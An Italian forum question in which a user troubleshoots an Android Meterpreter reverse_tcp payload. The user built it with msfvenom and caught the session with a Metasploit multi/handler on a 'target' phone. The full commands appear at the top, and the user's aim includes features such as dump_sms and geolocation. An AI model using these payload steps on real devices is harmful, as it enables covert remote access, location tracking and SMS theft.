Ho generato payload android di reverse_tcp usando msfvenom.
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip R > location
E ho impostato un listener nel mio msfconsole.
use multi/handler
set payload android/mterpreter/reverse_tcp
exploit
Quando eseguo l'APK sul telefono target mi ricollega, ma quando digito le opzioni non ottengo nessuna delle funzionalità di Android. Nessuna geolocalizzazione, dump_sms, ecc. Solo quelli predefiniti. Anche il carico utile è di 8.3Kb quando generato su Manjaro e 9.1Kb in Kali, quindi manca qualcosa.
Sto usando Manjaro e ho installato metasploit con la loro gestione dei pacchetti "pacman", metasploit è la versione 4.12.qualcosa.
Ho fatto lo stesso "hack" ieri dalla mia macchina Kali e tutto funzionava perfettamente, ma non riesco a farlo funzionare da Manjaro e mi sta facendo impazzire. Qualcuno ha un'idea?
EDIT: Non posso credere di non averlo visto. Il telefono target era in modalità Stamina, che probabilmente stava uccidendo la sessione immediatamente, senza nemmeno darmi la possibilità di digitare aiuto e vedere i comandi. Una volta disattivata la modalità Stamina, tutto funziona come prima.